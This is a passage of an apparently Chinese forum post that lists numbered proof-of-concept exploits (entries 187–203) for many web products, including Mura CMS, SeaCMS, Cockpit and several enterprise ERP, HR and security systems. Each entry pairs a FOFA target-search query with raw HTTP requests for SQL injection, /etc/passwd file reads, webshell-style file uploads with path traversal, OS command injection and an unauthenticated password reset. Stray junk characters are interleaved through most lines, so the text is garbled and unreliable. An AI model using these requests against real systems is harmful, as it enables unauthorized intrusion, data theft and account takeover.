POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
0 ^. B. X) `, a" }# kHost: your-ip
4 ?( }$ x/ }9 x% DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0. Z$ \8 S5 X4 s
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8/ i. |7 \/ H6 A: Y& Z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 |( Y0 u4 j/ P" M% _7 u2 PAccept-Encoding: gzip, deflate
# m: P, ]$ X3 IConnection: close
8 x$ U, e6 A6 z1 mContent-Type: application/x-www-form-urlencoded7 M5 l7 A, Q" c
4 E1 N' `2 T. O9 Q C! `req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
7 D: s& F6 p2 a5 M
/ j3 y3 i2 @7 ~" r f9 ^) y7 b5 S! S; O' A
187. Mura CMS processAsyncObject SQL注入' r$ E- h) K/ ]6 P; i0 J1 }; O
CVE-2024-32640
7 m7 E( Z: _7 A |. z& N1 S' l- [7 JFOFA:"Mura CMS"2 C& Y% Z8 _( C5 A
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
0 Y( w$ i* B% VHost: your-ip
* p) ~4 n4 p7 r8 w$ I7 RContent-Type: application/x-www-form-urlencoded8 R1 P2 ^4 _# u
b2 Z* }, M9 R2 ]1 M# m
$ c1 T+ }3 S/ J: ~. c9 m0 robject=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
, t6 d9 _" a. H/ O' k: x: J. Z q
4 h; }: r4 R, v- w ^% t5 V9 E9 G- O) Q. ~/ C6 ?9 o
188. 叁体-佳会视频会议 attachment 任意文件读取
$ Q Y3 f1 W& rversion <= 3.9.7" R/ k( N" W; V' [+ R
FOFA:body="/system/get_rtc_user_defined_info?site_id"
- w% F/ h- C6 NGET /attachment?file=/etc/passwd HTTP/1.1
5 d! A; @) N) K% PHost: your-ip% Q: t' Q4 G. a, v4 h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
* X. K$ G4 J3 Z& `Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.72 s: j G; l! R2 q# q5 ]# I1 P0 J4 B
Accept-Encoding: gzip, deflate' n7 g% B0 j) W8 ~
Accept-Language: zh-CN,zh;q=0.9,en;q=0.84 ]4 S) |. ?$ \1 h& }
Connection: close: N9 Y1 a1 _1 x7 l# r0 X. ^. p
( `% T4 d( C2 D8 m' k5 `/ B* Z' O7 i9 C0 h$ R! D( {
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
" S. a+ d# X* f' c0 x- qFOFA:app="LANWON-临床浏览系统"! m& Q* l) |+ W# _1 J! e- ~
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.17 m8 k( h$ A' p7 o
Host: your-ip- z; u" n. B" {5 B" _8 [6 x0 s
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
' ]7 p. }& c+ g$ t1 UAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7/ e8 l9 V, O2 ~# Q
Accept-Encoding: gzip, deflate& l s% y, i, {1 Z. t( ~0 ^6 B( l; C
Accept-Language: zh-CN,zh;q=0.9
7 u" F. j# z% p! ]3 s9 \2 z. kConnection: close; h' f9 [1 {% s9 _2 N4 t; ^
& w' s0 n$ z2 X: g/ Z5 Z
' E+ K7 c, c0 ^/ t4 B; N" z( W
190. 短视频矩阵营销系统 poihuoqu 任意文件读取2 C! q0 L" P2 b' Y6 w/ {+ e
FOFA:title=="短视频矩阵营销系统"
. {" q: o. e; N" k5 mPOST /index.php/admin/Userinfo/poihuoqu HTTP/2
+ z* v+ G: e: qHost: your-ip
! W" h8 g7 q- P# \- p/ X4 M8 P+ n! pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
1 f8 V3 o; u1 GAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
, B; `( Z! t/ a8 kContent-Type: application/x-www-form-urlencoded
% p: Y% B' r! sAccept-Encoding: gzip, deflate. k( h5 c; Y7 K( |( ]5 H& x% [
Accept-Language: zh-CN,zh;q=0.9, y* M" G6 @9 w& s1 p+ s0 }
9 k: S! F: t1 Q6 d$ q' c! J/ a
poi=file:///etc/passwd
" Y; N+ I+ [7 H# n# q. T2 R! |$ I: J$ X. t: I+ @0 z
Y+ H# J2 Y0 \4 c
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
* \+ e/ T, J+ o& y: l9 \FOFA:body="/CDGServer3/index.jsp"
9 u, O) C. \# X2 L3 lPOST /CDGServer3/js/../NavigationAjax HTTP/1.1- H% r2 X/ O! @- ~& _
Host: your-ip; A6 o8 k# y" i& g8 r1 k- J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
, Y1 f+ o' M( J( l6 f# NContent-Type: application/x-www-form-urlencoded! m0 f2 K" t- I
! O. O: M0 }; }9 E1 ?: scommand=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=, n9 I) o' J- j2 h. _7 |
2 c7 \; z. D- V2 |3 `6 J8 X& P( t- w4 S: x- ~
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传 s d0 ^8 Q- P ?/ e, d# Y9 Z% V
FOFA:title="用户登录_富通天下外贸ERP"
- A: H$ h# m0 U3 Y) v' ~8 {POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
/ U+ a+ z' n$ R) x$ v8 lHost: your-ip* u" K1 g1 b$ K4 }+ T+ o8 d% h% U
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36) Y! h: J& q" U
Content-Type: application/x-www-form-urlencoded
/ `3 x; q! C! n8 A
9 H; G3 V1 O7 f
! `$ \' ~! Z* i, C& v. @; E: _; u<% @ webhandler language="C#" class="AverageHandler" %>
# M* A! p2 d/ e* K) Y4 dusing System;
& v% @. A0 x% s7 n1 Husing System.Web;
- Y7 c9 P: R7 [& ~. \ C6 Y/ ^public class AverageHandler : IHttpHandler. I+ H! U2 A+ H' Q
{5 b/ x7 d/ c" ~3 u$ o# s% s# x
public bool IsReusable
1 N: }3 M3 W3 F' o8 H3 x" n{ get { return true; } }1 J& N9 K0 k% y6 e2 Z2 W
public void ProcessRequest(HttpContext ctx)
( L7 A% J+ R/ L: S% m; A' b{
2 k- c6 W0 @, n/ X; O3 F$ K7 Wctx.Response.Write("test");
+ b* d/ A( `* G: ]}
3 p! b0 y# a8 s}
/ c' d( G) Z0 v3 _1 i7 I# ]& v; z( J$ n6 ~' v+ b* d
7 }# M- v2 M. q- I2 M
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行. B& d5 ^6 \. z8 X: K
FOFA:body="山石云鉴主机安全管理系统"4 ~& C: P% {4 S3 P: X4 W3 q
GET /master/ajaxActions/getTokenAction.php HTTP/1.1* M( D0 M+ _* `/ m1 x6 f
Host:" \5 a0 H% u* L$ D4 j6 v
Cookie: PHPSESSID=2333333333333;
; R; D8 s8 H8 w+ ~% CContent-Type: application/x-www-form-urlencoded9 l/ T. ]# f, n/ Y$ _/ W
User-Agent: Mozilla/5.0& ^$ `# W/ C6 c3 ?1 I7 F8 Q; c
7 @+ [0 A7 A, w# A6 x2 s% ]
0 ?9 y6 L1 x( x- c* o( [' w7 e
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1% _+ G/ R# D! H7 R: ^
Host:
/ {. U/ ^; o4 ~+ S& z4 Z" gUser-Agent: Mozilla/5.0
$ H. Z1 q/ I8 n5 x- q8 `Accept-Encoding: gzip, deflate
2 V4 o) A) J) O1 j) Z2 hAccept: */*: q; x5 [& Z8 t4 l" M
Connection: close
+ E8 P( h" A' `- p3 jCookie: PHPSESSID=2333333333333;
, {/ d5 p" J1 P! M/ wContent-Type: application/x-www-form-urlencoded
$ N. D) P5 A* `Content-Length: 84
! D8 X+ ~$ x7 k. D- ?! f! ]
, ]3 y W. r5 U* Rparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')9 G+ _5 M+ F) A8 d2 L& s
1 U) q. j: F: H( T( ]1 D! C8 d. h, H
GET /master/img/config HTTP/1.1) |9 w3 R, e4 K6 Y2 T
Host:
8 M: {- [; E; o! n! ^# v( S4 G" I0 v* F \User-Agent: Mozilla/5.0, G7 a; c: P" ~7 }' X0 l
/ i9 g* s4 {4 i+ M7 K) B! d5 h2 w6 T" i& H+ P* p/ [
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
6 ` I" u: S9 ]5 TFOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
' D- H7 x# c$ n4 O: E
6 S0 S" B6 R4 EPOST /servlet/uploadAttachmentServlet HTTP/1.1
9 L0 d& k+ B) Z5 Q0 H9 EHost: host4 Y# f7 n3 w p# F C, ^- ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
4 S! T- `$ a4 @8 x0 iAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
# v1 q& F- ` R! ]0 m4 `' F" N6 mAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 J9 `, I* u1 m5 |7 q
Accept-Encoding: gzip, deflate- }5 j3 N- M1 D; `1 t
Connection: close
) s# p& B6 W2 N$ z2 S: V. s xContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
& R8 I7 ]$ C5 e) u- `# t/ P------WebKitFormBoundaryKNt0t4vBe8cX9rZk
- }# z4 ]$ C& d' Q5 \( y$ R& k$ x, h) U, h/ B3 c7 g
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"6 t0 Z6 ^, l3 |/ b( \# L
Content-Type: text/plain$ A) I0 l( Z" x& S# @' F
<% out.println("hello");%>
8 a$ c/ A! k" E1 E------WebKitFormBoundaryKNt0t4vBe8cX9rZk: f7 ~# f% C# G7 @* S9 \, [
Content-Disposition: form-data; name="json"3 s! G0 f$ }4 a2 L. Y
{"iq":{"query":{"UpdateType":"mail"}}}
?) O) Z* s6 g/ I2 O3 ^0 R------WebKitFormBoundaryKNt0t4vBe8cX9rZk--( o- T* B# M9 j/ O4 @9 ?
* r! t! t/ x. H& T% p
/ M4 U/ k0 h# e2 n4 h# o195. 飞鱼星上网行为管理系统 send_order.cgi命令执行2 x. ~: O: U! `. m1 ^/ X' Q0 {8 u
FOFA:title=="飞鱼星企业级智能上网行为管理系统
4 }: C# P2 P/ B! N2 a2 l; q CPOST /send_order.cgi?parameter=operation HTTP/1.1
7 c: J# K/ v8 W8 [Host: 127.0.0.1- U6 o* e- H: T/ c& e
Pragma: no-cache) p) k* j- x5 z! s S7 t* ~. b* p
Cache-Control: no-cache s6 w) m R- p) t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
( u Y$ L" a8 |Accept: */*! D) j0 q; B& X) C2 Z
Accept-Encoding: gzip, deflate+ L1 Q! i7 a0 [9 L
Accept-Language: zh-CN,zh;q=0.9
- b9 c( Q/ I3 ~Connection: close, P8 V: w! N" |# K5 [' v# j; \5 J( X- [
Content-Type: application/x-www-form-urlencoded
K9 k) }( K" Z( ~/ tContent-Length: 68
" o' P2 D2 p- o5 q/ N' e
: f) Z' T5 e, P( C- E{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}1 z1 `/ b3 I) t! U9 T& f) a
% E+ Q; G" Y# x% ^( B! V# q: o
& {6 g) f5 s( M' F# |5 a' A196. 河南省风速科技统一认证平台密码重置
2 _- J- [5 C4 j( t xFOFA:body="/cas/themes/zbvc/js/jquery.min.js"
) N% Z+ L; M+ F/ H+ XPOST /cas/userCtl/resetPasswordBySuper HTTP/1.1
: o; p; s H; K: j4 k% J2 yUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
, d P" x! y. w8 f4 CContent-Type: application/json;charset=UTF-8
$ D: r2 u t- K OX-Requested-With: XMLHttpRequest
q' ~, e( a) H" m, iHost:
~( ~$ Q% }9 c0 S2 B+ WAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
' m" Z" |& E* X2 A3 [* ?7 u7 xContent-Length: 45
# S$ z- `0 f4 a: TConnection: close$ Z( X1 D. s3 N: C3 v s
* r/ ^3 ^1 t: Z- p7 I{"xgh":"test","newPass":"test666","email":""}
% R& o; @/ ~/ L# ?; G# U8 Q
5 u- r6 H6 z1 f+ ~4 N& ~0 [- J/ G
1 W% a8 ~0 g0 E0 h9 s) K' T# o
- h# x Y" \2 h0 ^ p; H7 l5 z2 c5 y197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入' |6 p. _# h; l+ c. T+ J. H* s
FOFA:app="浙大恩特客户资源管理系统"+ d: S" X' Y7 O. ?( h6 ^& \# Z
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
) Z* w! W2 N7 y @Host:, ]7 Q& {. j1 A7 z( ]" h% b) ]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
. a% H" ^1 l% hAccept-Encoding: gzip, deflate
. y$ u* Q4 b' s- ?Connection: close$ l, W+ @0 q+ v4 W
t2 P6 R# j f7 H' {; M, J3 s8 c
# [4 m! b3 H& H( y
198. 阿里云盘 WebDAV 命令注入
7 G5 N: r6 v r' x& V- DCVE-2024-296405 i$ u9 L e- C: }" K. m! X- I
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
4 z, o* y! K+ ~: c& vCookie: sysauth=41273cb2cffef0bb5d0653592624cf644 b& W: s0 H5 j( E1 @( `" o3 H
Accept: */*1 h4 Q6 J8 Y ~
Accept-Encoding: gzip, deflate% i' ^) D" P' c9 J, {' ^3 l
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
6 M& K% D; p& ^ c: ?Connection: close
6 J% R9 X* {. v9 l/ A3 V( U, F
n, k: |7 w1 F ], h2 s z' s
. u9 d; [' N$ {6 @/ O' D \4 |, M199. cockpit系统assetsmanager_upload接口 文件上传! I: n! \9 e1 ~3 G/ s
; a- H7 h% { F3 f- C4 a) l& N
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
# x- I9 f' Y+ r% P5 D V# `' |+ i. }GET /auth/login?to=/ HTTP/1.1
% J; _) S0 t8 Y; h8 ?- Y# w/ H/ @0 c$ ]! Z+ }( |/ M; i
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"2 J2 U u$ B3 J0 o+ ?. J
9 \4 S g& o) q2 W! U+ a+ w
2.使用刚才上一步获取到的jwt获取cookie:
5 B2 G( {+ _5 [) [1 m2 t0 o5 I; c5 H: N, _% ^4 l' a+ \
POST /auth/check HTTP/1.1
* ^- R. }: m; CContent-Type: application/json
* w9 e# ^, c: I+ U( q$ p% j3 i# w& W0 z) V
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}% R9 n0 H4 \4 ]& s3 r' J, ~5 O
# d; |5 s9 a- F0 @; |
响应:200,返回值:& }; o) A! b D) Y" @% P
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/: c& V9 d& E3 E" s8 I) t
Fofa:title="Authenticate Please!". ?5 V/ C/ E4 q) E* Z
POST /assetsmanager/upload HTTP/1.1/ @0 N5 D5 [: A7 W
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
: q; F. \8 Z0 h2 QCookie: mysession=95524f01e238bf51bb60d77ede3bea92
" m- f! t! |6 M3 N$ }7 ~' O _( M( s, B& q5 z( J N7 Q- q
-----------------------------36D28FBc36bd6feE7Fb32 r5 B1 W: m6 Y( C. d
Content-Disposition: form-data; name="files[]"; filename="tttt.php"1 }+ d1 q* Y5 z7 M4 G3 K
Content-Type: text/php
M8 L2 Q( E9 v" ^ z
) C# d" j. t+ {6 q" k<?php echo "tttt";unlink(__FILE__);?>
: j5 [& z9 P. @" t9 a, |2 l: I/ Y% ?-----------------------------36D28FBc36bd6feE7Fb3+ j, x- j/ X. A0 D) z* i5 c4 C
Content-Disposition: form-data; name="folder") q( z; S- I* ]0 e! L4 A8 k7 X
# o$ c# f& m: C! w; I9 X% i8 I- p-----------------------------36D28FBc36bd6feE7Fb3--' _! O6 m$ b. d8 d. R/ g+ p0 M: y
0 w' r+ s5 ]1 X# q
2 `6 x5 P3 Q" j" M3 U/storage/uploads/tttt.php" V' t; ~: ~6 p; ~
9 a0 X$ j2 R0 a: @" K6 Z m200. SeaCMS海洋影视管理系统dmku SQL注入
_% {- v3 K$ v7 I/ l# XFOFA:app="海洋CMS"
9 t! Z5 K/ _6 `8 _6 fGET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1( v' v5 j& c) n& F' ^ W
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s. `% r+ l) R$ {: U- B% w4 y9 x
Upgrade-Insecure-Requests: 16 |/ ?. n% z1 P7 N
Cache-Control: max-age=0, |, b. \; H1 U: o6 P
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.79 c. p2 j( q: c$ ]: d$ w
Accept-Encoding: gzip, deflate9 N0 H2 Q% B; t. U- s: h
Accept-Language: zh-CN,zh;q=0.9
8 l( s2 }4 N# m/ ]! {/ k* L9 y, w4 {7 m' d! k5 ]
1 i* c9 x- s' i ^4 Q7 B
201. 方正全媒体新闻采编系统 binary SQL注入
5 y6 Y k8 h2 c' t9 J3 GFOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"9 S% J* J8 Z; L7 w( {
POST /newsedit/newsplan/task/binary.do HTTP/1.1
* x4 n5 s, f& [7 Z( K1 L0 l0 _; W: ~Content-Type: application/x-www-form-urlencoded/ l) j! M* u- f: W# o1 l, @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; E; k* H& }. z# M1 d6 R
Accept-Encoding: gzip, deflate1 v4 p2 `% N% Y% T
Accept-Language: zh-CN,zh;q=0.9
1 t5 H. x( l) d1 FConnection: close/ K. w" s- x8 x9 G& K
/ `( g, q% @8 B7 s5 V! w) o; B
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=16 ~' W1 j" g3 x6 @6 c
# q1 n6 x- W+ ~% u1 }
3 e5 j% o# H9 r' W4 ?- Y. f202. 微擎系统 AccountEdit任意文件上传: H8 ~5 Z( W' e- \5 \- `* j" J
FOFA:body="/Widgets/WidgetCollection/"5 O; i# C& S# `/ t
获取__VIEWSTATE和__EVENTVALIDATION值 T1 D: }$ G. M' y# e' n
GET /User/AccountEdit.aspx HTTP/1.1
8 T* m1 x& s# t7 p4 B8 SHost: 滑板人之家
1 ]4 w* W( G c& L" SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31 N& n% U/ Z. U
Content-Length: 03 \1 @) r& E: i# N v" r1 M
- ]0 {+ U" } C8 K& I
3 M% F' j" `9 [# T! Y! i
替换__VIEWSTATE和__EVENTVALIDATION值
( u0 X6 U2 j# |2 TPOST /User/AccountEdit.aspx HTTP/1.1
* d) c$ _8 E7 J5 z# UAccept-Encoding: gzip, deflate, br
7 O; d& g5 }8 ?. B2 D6 FContent-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
R1 t1 t# n- p$ s _
' y: J: i. z* t$ @1 b3 V-----------------------------786435874t38587593865736587346567358735687( @+ i. n# V% x" u* L
Content-Disposition: form-data; name="__VIEWSTATE"2 S1 x) M2 E: }5 L
- ~8 m0 a; x% I6 c, [
__VIEWSTATE
. c7 z' s. Q# M4 X9 |& t-----------------------------786435874t38587593865736587346567358735687
" d- H* r' k$ _. a& [" P) t; CContent-Disposition: form-data; name="__EVENTVALIDATION"
- M1 S ], b& e7 r# J4 s' o, [2 h9 f# H. d
__EVENTVALIDATION
# v# w0 ?, \5 ^+ U7 B-----------------------------786435874t38587593865736587346567358735687: r0 Q/ o9 I6 |% a3 Q# Q
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"2 v9 S$ k* W- A) m
Content-Type: text/plain- B! n$ L/ b" G1 ]; L5 y
( Y! H' ]2 j% j, a# A; O# MHello World!' N4 ]: Q3 f6 w
-----------------------------786435874t385875938657365873465673587356871 n% w, V1 Y7 Z* C" ?/ q8 E2 s
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"3 J- a( c7 X1 B1 G$ M U0 [2 `
; U5 e$ k" C1 g; y
上传图片
( w+ ]& x( M0 N$ T! v5 _$ u-----------------------------786435874t38587593865736587346567358735687
/ H0 \! i+ }3 f# BContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
/ [8 J9 m8 b/ M4 F' ]9 b
' Q9 m' o4 y e+ P0 h& v, x. L- P- y, a6 a' N0 f8 H7 p
-----------------------------786435874t38587593865736587346567358735687( x! u8 l! l: r+ T0 F4 m0 X; x
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
: y4 W* p5 e' e5 S( R
6 V" x) E% X, S* u( f
7 C K! j0 r0 c7 W" X5 U, R-----------------------------786435874t38587593865736587346567358735687--
+ F+ e h& X6 B9 f# W
" E, r: f k% k6 e0 Y% k+ s) w6 Y% c! n! M
/ {/ |: y8 U% l1 g3 Z+ A/_data/Uploads/1123.txt
2 g" o) w1 Y. _& l
- C% z f) S) A1 @7 y203. 红海云EHR PtFjk 文件上传
0 D$ X- F) z2 z$ T& Q8 n- T& KFOFA:body="RedseaPlatform"
! m$ L3 w/ S$ UPOST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
0 k8 g' }2 } b$ rHost: x.x.x.x& p& j7 `% B+ g+ i
Accept-Encoding: gzip2 R! Q: f% j- v# F( s/ g+ ~
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
0 C0 x" `' [1 x) ]8 D: P7 p" wContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
" j [9 { j7 W2 U" X& L- gContent-Length: 210% ]4 ~6 s. F: V2 M' |5 a/ b2 c, _0 O
, [' F2 v+ h* ~) m
------WebKitFormBoundaryt7WbDl1tXogoZys41 j, l5 d4 [& R! N2 I- o8 a# h
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"9 A8 O. n: ~* v, w
Content-Type:image/jpeg
4 s: F0 H# R% M% U6 ~$ n6 |5 F# _0 M8 w- T( V0 V9 w
<% out.print("hello,eHR");%>
( p* j7 }/ o5 o( {, V3 m6 t) {: \------WebKitFormBoundaryt7WbDl1tXogoZys4--' |0 l C0 G9 s
5 u+ K- j+ t( t! T: `1 U
1 m5 e- n0 C& I) k9 I, n+ B. }, }+ X3 M! x$ N; e, _
' Q7 P! W7 k& Y7 w# r
1 X5 f$ E8 G( X
& S& |4 F4 i8 p+ X! m
|
发表于 2024-6-5 14:31:29
收藏
支持
反对